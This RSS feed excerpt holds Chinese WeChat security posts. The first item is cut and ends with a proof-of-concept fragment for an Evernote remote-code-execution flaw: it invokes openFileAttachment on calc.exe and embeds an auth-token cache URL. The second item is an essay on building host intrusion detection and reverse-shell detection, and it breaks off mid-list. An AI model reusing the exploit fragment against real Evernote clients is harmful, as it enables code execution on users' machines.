26px;">&#39;boron.actions.openFileAttachment&#39;</span>,data:{<span style="color: #98c379;line-height: 26px;">&#39;resource&#39;</span>: {<span style="color: #98c379;line-height: 26px;">&#39;hash&#39;</span>:<span style="color: #98c379;line-height: 26px;">&#39;2f82623f9523c0d167862cad0eff6806&#39;</span>,<span style="color: #98c379;line-height: 26px;">&#39;mime&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/octet-stream&#39;</span>,<span style="color: #98c379;line-height: 26px;">&#39;rect&#39;</span>: {<span style="color: #98c379;line-height: 26px;">&#39;left&#39;</span>: <span style="color: #d19a66;line-height: 26px;">68</span>,<span style="color: #98c379;line-height: 26px;">&#39;top&#39;</span>: <span style="color: #d19a66;line-height: 26px;">155</span>,<span style="color: #98c379;line-height: 26px;">&#39;width&#39;</span>: <span style="color: #d19a66;line-height: 26px;">728.1428833007812</span>,<span style="color: #98c379;line-height: 26px;">&#39;height&#39;</span>: <span style="color: #d19a66;line-height: 26px;">43.42857360839844</span>},<span style="color: #98c379;line-height: 26px;">&#39;state&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;loaded&#39;</span>,<span style="color: #98c379;line-height: 26px;">&#39;reference&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;22cad1af-d431-4af6-b818-0e34f9ff150b&#39;</span>,<span style="color: #98c379;line-height: 26px;">&#39;selected&#39;</span>: <span style="color: #56b6c2;line-height: 26px;">true</span>,<span style="color: #98c379;line-height: 26px;">&#39;url&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+<a href="https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f" target="_blank">https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f</a>&#39;</span>,<span style="color: #98c379;line-height: 26px;">&#39;isInk&#39;</span>: <span style="color: #56b6c2;line-height: 26px;">false</span>,<span style="color: #98c379;line-height: 26px;">&#39;filesize&#39;</span>: <span style="color: #d19a66;line-height: 26px;">45056</span>,<span style="color: #98c379;line-height: 26px;">&#39;filename&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;calc.exe&#39;</span>},<span style="color: #98c379;line-height: 26px;">&#39;url&#39;</span>:<span style="color: #98c379;line-height: 26px;">&#39;en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+<a href="https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f" target="_blank">https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f</a>&#39;</span>,<span style="color: #98c379;line-height: 26px;">&#39;noteGuid&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;f4cbd0d2-f670-52a7-7ea7-5720d65614fd&#39;</span>,<span style="color: #98c379;line-height: 26px;">&#39;appName&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;&#39;}})<br/></span></code></pre><blockquote data-tool="mdnice编辑器" style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px none rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">某知名安全大V，昨日印象笔记被黑</p></blockquote><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003674" data-ratio="2.0296296296296297" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b103445c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DynjEx8PW9cicEcNUawO9Hib7ETlRkB7luo8Ix8muek3EeG4paZU4LBMPw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><blockquote data-tool="mdnice编辑器" style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px none rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">延伸阅读</p></blockquote><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003675" data-ratio="10.024074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=04f0e896&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DybaODOiaLVTcD8wUumHCJ7DZnnCT4EjT3TGGUicSicK616ibSEbmebmWMcw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><blockquote data-tool="mdnice编辑器" style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px none rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">最近的小玩意</p></blockquote><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);line-height: 1.8em;letter-spacing: 0em;">AI重构安全热点</section></li><li><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003673" data-ratio="0.9925925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=89dbdf4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyNUp02icA9baEZpASXH7LupChWE1dhlicc7dGU2WMt1BNiaPMcg7Tv0Z4A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);line-height: 1.8em;letter-spacing: 0em;">Ai重构知识库+智能书签+导航</section></li></ul><p><img class="rich_pages wxw-img" data-imgfileid="100003670" data-ratio="0.937037037037037" data-w="1080" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=4c9f5841&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyWGLFwfIgUdL5fVA6F33Eu0yic66ww0OczarsWtGoR3TLCNYVnXajCAg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003672" data-ratio="0.587037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=0afab000&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyLaCfov9GGZA9cd6icIYuP5IKw4vs78vawr5Ex9T6p2KcDpuGLaGqmPw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);line-height: 1.8em;letter-spacing: 0em;">花费, 周均一亿多token</section></li></ul><p><img class="rich_pages wxw-img" data-imgfileid="100003671" data-ratio="0.3972222222222222" style="display: inline;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f3060466&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyLoDJwXHiar1y4ibZjsxCMA43I7AU3MmgUMsy6eWyUdibY4VZ0ibVDsXAWw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);line-height: 1.8em;letter-spacing: 0em;">自动化输出方式(快讯星球+微博)</section></li></ul><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;margin-top: 10px;margin-bottom: 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/98Nz5LFElxzdExAnJcAwRIq2IIHILR4B4jrwEPb1lOJkr0MbPEpgEGkibpic5JdqX37KQGhyH9pyMEjvn4Ve17KgmCXxV6NBIw/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;">部分能力后期会开放，比如知识库/迪斯科等，星球身份应该是后期各服务的通行证<br/>AI目前比较贵，为了可持续发展，设置了星球的地板价<span style="color: #d19a66;line-height: 26px;">25</span>元(系统最低价)</code></pre><p><img class="rich_pages wxw-img" data-imgfileid="100003669" data-ratio="1.3444444444444446" style="display: inline;" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=0a54c452&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyssgvAvnnTufYJpqzek9hAYycEWzUP57qRkLa7Gf458C8E6PFf3khTg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-imgfileid="100003664" data-ratio="1.219435736677116" style="display: block;margin-right: auto;margin-left: auto;border-style: none;border-width: 3px;border-color: rgba(0, 0, 0, 0.4);border-radius: 0px;object-fit: fill;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;" data-type="png" data-w="638" src="https://wechat2rss.xlab.app/img-proxy/?k=5fe11de1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0Dyp64ZtycStwT7conLOibhhcQvhYuoapl9xPBCMP8icCbZvzvr222LJAng%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-imgfileid="100003665" data-ratio="1.7795957651588066" style="display: block;margin-right: auto;margin-left: auto;border-style: none;border-width: 3px;border-color: rgba(0, 0, 0, 0.4);border-radius: 0px;object-fit: fill;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;" data-type="jpeg" data-w="1039" src="https://wechat2rss.xlab.app/img-proxy/?k=8194093d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0Dy1FFdGtVj8hagUkBUP6NBSQFj0YN4hgDfRTegalIlckxxLNI4DXJFuA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></figure><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);line-height: 1.8em;letter-spacing: 0em;">沟通群(过期添加<code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;margin-left: 2px;margin-right: 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;">red4blue</code>,备注加群)</section></li></ul><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-imgfileid="100003668" data-ratio="1.0833333333333333" style="display: block;margin-right: auto;margin-left: auto;border-style: none;border-width: 3px;border-color: rgba(0, 0, 0, 0.4);border-radius: 0px;object-fit: fill;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8260f5c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyficsetRouXGwCnztEwb9kSNXUEtJmwdHTcojhqF7yiboxl2iaAMdFaGuw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></figure></section><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://0reg.dev/blog/evernote-rce">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a05abb33&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487332%26idx%3D1%26sn%3D71b33d61aa38bffd24ebc8ac825b419f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 11 Jul 2024 08:00:00 +0800</pubDate>
    </item>
    <item>
      <title>方法论 | 我与入侵检测的二三事儿</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487300&amp;idx=1&amp;sn=d2bb372406293f3dc888dba831925c65</link>
      <description>总结毕业后的六年经历，从扫描器萌新，到入侵检测的“青年”油条，希望能对各位有一些参考价值。一、扫描器18年的</description>
      <content:encoded><![CDATA[<p>
<span>Fr1d4y</span> <span>2022-08-29 18:00</span> <span style="display: inline-block;">新加坡</span>
</p>

<p>总结毕业后的六年经历，从扫描器萌新，到入侵检测的“青年”油条，希望能对各位有一些参考价值。一、扫描器18年的</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=6a5d4ed4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FSfhB0IDvicQmvKVCpCVef54vCgBah8ibXNMlKej5HEFYXC1Cq4GgDAo7Zpaia8JWfTytNevzylziaqiawAO6qUiarpzg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="margin-bottom: 0px;">总结毕业后的六年经历，从扫描器萌新，到入侵检测的“青年”油条，希望能对各位有一些参考价值。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;"><span style="font-size: 20px;"><strong>一、扫描器</strong></span></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">18年的夏天，我毕业刚满两年。每个工作日都沉浸在代码里，在扫描器的世界里挥斥方遒，poc数量和漏洞成果都越积越多，工作充实但内心的空洞却越来越大。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">在机械化重复的工作间隙里，我一直在思考几个问题。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我是怎么走上这条路的？我没有主动选择过，但机缘巧合之下，全身都被贴满了扫描器的标签。实习的时候被安排的第一个任务是内网端口扫描，毕业后第一份工作是维护商业扫描器，后来变成自己来写扫描器。看似在不断进步——从一个模块，到整体维护，再到重构，实际上却被重复工作填满，个人成长非常有限。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我真的想做扫描器吗？最一开始的时候想做，刚毕业的萌新眼里，哪里都蒙着神秘的面纱，什么都想学。但真的花了两年摸了一遍之后，祛魅环节完成，扫描器就如同墙上被拍扁的蚊子血，失去了光彩。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">这条路还有发展潜力吗？当然有，可以优化架构减少重复工作，也可以深入底层代码原理做性能优化。但我不想成为架构师，再继续下去，代码能力会成为束缚而非助力。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">是时候换一个方向了。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">寻觅良久，我盯上了HIDS——功能复杂繁多，历史积淀与未来发展并存，是一个绝佳的、值得深入研究的工作方向。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;"><span style="font-size: 20px;"><strong>二、转职</strong></span></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">“转职”的过程并不顺利，我原本想在Q公司内部转方向，但我所在的团队讲究“孤狼”文化：一两个人负责一个小项目，快速迭代出成果。HIDS实在不是一两个人短期内能完成的项目，数据采集和安全分析是两块儿巨大的蛋糕，很难一口吞下。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">于是我离职换了工作，本以为到了K公司会柳暗花明又一村，结果变成了更孤的狼。总归还是做了一些努力：开发能力不过关，那就用开源系统OSQuery；没有数据分析能力，那就从头开始学。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">结果还是不如人意，OSQuery虽然省去了很多工程化的工作，但各公司的基础环境不同，推动的时候遇到了非常多的阻碍，稳定性问题频发，覆盖率也一直上不去；数据分析学了一些，但巧妇难为无米之炊，没有数据谈何分析？</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">后来我离开K公司的时候，HIDS的部署量大约还剩百十来台机器，惨惨淡淡凄凄凉凉。再往后K公司也招了几位专业的研发同学，完全抛弃了OSQuery那一套东西，纯自研迭代了几轮之后也全部覆盖上了，不过这就已经是后话了。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">在最迷茫的时候，我看到了一篇文章——《<span style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;"><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MjM5NjQ5MTI5OA==&amp;mid=2651749345&amp;idx=1&amp;sn=ad14b231b59bd7158db25da639b13115&amp;scene=21#wechat_redirect" textvalue="浅谈大型互联网的企业入侵检测及防护策略" linktype="text" imgurl="" imgdata="null" tab="innerlink" data-linktype="2">浅谈大型互联网的企业入侵检测及防护策略</a></span>》<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">，条</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">理清晰、深入浅出的讲解了入侵检测中遇到的种种困境及解决思路。</span></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">所以，毕业第四年，第三份工作，我选择了M公司。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">高中的时候有一位老师说过一段话，让我至今记忆犹新：“学习，是一个先把书读厚，再把书读薄的过程” 。读厚是指深入理解书里的原理，每页里都有厚重的故事；而读薄是指将技巧融汇贯通，摒弃招式，形成“方法论”，便能举一反三掌握各种变形。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">这篇文章便是一本书，来到M公司后，我先将书读厚，书里每一句精炼概要的道理，我都在工作中不断经历、实践，所以知其然知其所以然；而后将书读薄，抽象方法论，万变不离其宗。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">接下来便是我在M公司的“读书”小记。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;"><strong><span style="font-size: 20px;">三、基建</span></strong></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">来M公司前，我以为HIDS的迭代路线是这样的：先把HIDS Agent该做的功能做的八九不离十，然后慢慢的灰度铺开，发几个版本修复bug，就可以开始写检测规则了。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">而我入职的岗位职责之一就是“写规则”，推导一下，那Agent大概成熟度已经很高了，一定是在持续稳定的采集各类数据，就等我去分析建模了。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">所以当我入职没几天，就发现HIDS Agent是全量挂掉的状态的时候，内心是有点儿噩梦重现的恐惧感的。尤其是挂掉的原因，又是稳定性问题——HIDS依赖的中间件故障。类似的问题，我在K公司定位了好几个月都没有解决…</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">但噩梦还没来及展开，就光速结束了。M公司内部建设HIDS实际有两个团队，将基建与数据分析拆分开，专业的人做专业的事情。全量停机的问题看起来严重，但在专业的研发同学眼里，并不是关键的技术瓶颈。大约两三周之后，问题修复，Agent重新灰度上线。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">后来类似的事情又发生过几次，每次的原因都不尽相同，比如资源超限对业务产生影响、逻辑错误导致bug等等，在专业靠谱的研发团队支撑下，也都平稳度过，极少发生全量回滚/下线的情况。（研发团队指路-&gt;《<a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MjM5NjQ5MTI5OA==&amp;mid=2651750220&amp;idx=2&amp;sn=26e1ae8056e4fd7db5e953e946a00b78&amp;scene=21#wechat_redirect" textvalue="保障IDC安全：分布式HIDS集群架构设计" linktype="text" imgurl="" imgdata="null" tab="innerlink" data-linktype="2">保障IDC安全：分布式HIDS集群架构设计</a>》）</p><p style="margin-bottom: 0px;"><br/></p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.9214285714285714" data-s="300,640" style="" data-type="png" data-w="280" src="https://wechat2rss.xlab.app/img-proxy/?k=9bd3d8e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FSfhB0IDvicQmvKVCpCVef54vCgBah8ibXNZ8ic9ibS20MytXp1VojfGSKU2mFQ5LB6Q5h6p7Y4k1azXXhv7ibspnQZw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">当然除了稳定性问题，Agent的采集能力也与我想象中的“八九不离十”相差甚远。Agent早期存在非常多的数据质量问题，比如数据关联错误、短进程数据丢失、采集逻辑不全面等，每个问题都难以预知，也对后端的数据分析有非常大的影响。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">数据源的问题很难一次性全部暴露出来，通常是在数据分析到一半的时候才发现问题，有时候还会影响很大。比如数据关联错误的问题，业务逻辑是A进程访问某敏感文件，但是错误关联成了B进程访问敏感文件，让行为模型的误报量飚高，只能等Agent修复后，模型的误报量才能到达上线标准。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">当时定位问题的过程也非常坎坷，是否取错需要人工判断，而取错又是小概率事件无法稳定复现，代码层面上看不出问题，摸黑改了一次效果有限。而Agent变更可能会影响业务，所以灰度的周期很长，每次修改验证都动辄以月计，模型的进展也阻塞在这里，情况非常紧张。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">无奈之下，我们用“大数据”找了一批复现概率比较高的机器和取错组合，提供给研发同学后，有了复现和验证的环境，再加上专业能力，问题很快就解决了。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">类似的曲折故事，在推进数据源采集能力提升的过程中发生了很多次，但总归是在各自发挥专业优势、互相协作的的情况下，不断克服困难并持续进步。几年过去，目前Agent的稳定性和采集能力都有了明显的提升，关键数据源极少再出现取错或者漏取的问题，有效支撑了安全检出能力。</p><p style="margin-bottom: 0px;"><br/></p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1" data-s="300,640" style="" data-type="png" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=9fc90714&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FSfhB0IDvicQmvKVCpCVef54vCgBah8ibXNwOP4NSHyfm3hfesGJFKKLhtabBkewUf7wYzmrJ7Xf6IwicLTr4vXjKQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;"><span style="font-size: 20px;"><strong>四、建模及告警</strong></span></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">头三年的工作经历里，我做过一些安全规则的工作，以反弹shell、提权这一类比较简单的策略为主。但在我想象中，M公司这种成熟的公司肯定会更关注高级的攻击手法，为了避免“囊中羞涩”，我还专门花时间去研究了下Rootkit、后门、进程隐藏这些“高级”手法。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">实际入职后，也是出乎意料的没有用武之地。因为第一件事情，还是反弹shell。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">接到这个任务后，我第一反应就是回忆以前反弹shell的规则是怎么写的——在命令层面加一些关键字检测，然后撸袖子准备开始干活。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">很快就被领导拦下来了，并且发出了一连串灵魂拷问：反弹shell一共有哪些手法？使用频次如何？哪些能在公司环境下使用？现在支持哪些手法的检测？本次要新增对哪些手法的支持？这些手法除了命令之外，有哪些维度特征？如何防止绕过？需要哪些数据源支撑？</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">方向比努力更重要，所以在开始动工之前，按照领导的指导，我花了几天去做大盘的梳理盘点和对标：</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">反弹shell的本质是什么？</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">shell 通过特定的 连接方式 （与 通讯主体 进行通讯，然后由 通讯主体 ）与外部攻击者进行通讯。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">攻击者通过特定 监听手段 控制机器。</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">反弹shell有哪些手法？</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">分别有哪些特征？</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei 